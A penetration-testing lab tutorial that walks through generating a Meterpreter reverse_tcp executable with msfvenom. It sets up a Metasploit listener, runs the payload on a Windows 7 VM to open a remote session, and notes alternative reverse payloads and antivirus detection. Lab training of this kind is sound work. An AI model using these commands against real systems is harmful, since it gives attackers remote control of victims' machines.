Before starting this exercise, make sure you have completed the previous exercise “Setting
up a Penetration Testing Lab with Kali Linux and Windows 7 in VirtualBox” to have a
Windows 7 machine ready for exploitation.
Step 1: Update and Upgrade your Kali Linux machine
● Open a terminal window in Kali Linux
● Run the command sudo apt-get update to update the package lists
● Run the command sudo apt-get upgrade to upgrade the installed packages
Step 2: Generate a payload using msfvenom
● Open a terminal window in Kali Linux
● Run the command msfvenom -p windows/meterpreter/reverse_tcp
LHOST=IP_of_Kali_machine LPORT=4444 -f exe > payload.exe to generate a
meterpreter reverse TCP payload. Replace IP_of_Kali_machine with the IP address
of your Kali Linux machine.
Step 3: Start the Metasploit Framework
● Run the command msfconsole to start the Metasploit Framework
Step 4: Configure the listener
● Type use multi/handler to start the listener module
● Type set payload windows/meterpreter/reverse_tcp to set the payload
● Type set LHOST IP_of_Kali_machine to set the IP address of the Kali Linux machine
as the listener IP
● Type set LPORT 4444 to set the listener port
● Type exploit to start the listener
Step 5: Deliver the payload
● Transfer the payload.exe file to the Windows 7 machine using a USB drive or any
other method
● Run the payload on the Windows 7 machine
Step 6: Verify the Meterpreter session
● Go back to the terminal window with the Metasploit Framework listener
● You should see a message indicating that the meterpreter session has been
established
● Type sessions -i to interact with the session
Step 7: Clean up
● Type sessions -K to terminate the session
● Remember to revert any changes made to the Windows 7 machine and reset the
machine to its original state before starting the exercise.
Note:
● This exercise is for educational and ethical hacking practice in a controlled lab
environment. Attempting to exploit vulnerabilities without permission is illegal and can
cause serious harm.
● Use the most updated version of msfvenom as the payloads may have been
detected by security software by the time you are attempting this exercise.
● Make sure that the Windows 7 machine has the necessary permissions to run the
payload.
● Keep in mind that the payload you generated is just an example, you can use other
payloads as well, such as reverse_https, reverse_http, reverse_tcp_dns, etc.
Reference links:
● msfvenom documentation: https://www.offensive-security.com/metasploit-
unleashed/msfvenom/
● Metasploit payloads: https://www.offensive-security.com/metasploit-
unleashed/payloads/
● Metasploit Framework: https://www.metasploit.com/
● VirtualBox: https://www.virtualbox.org/
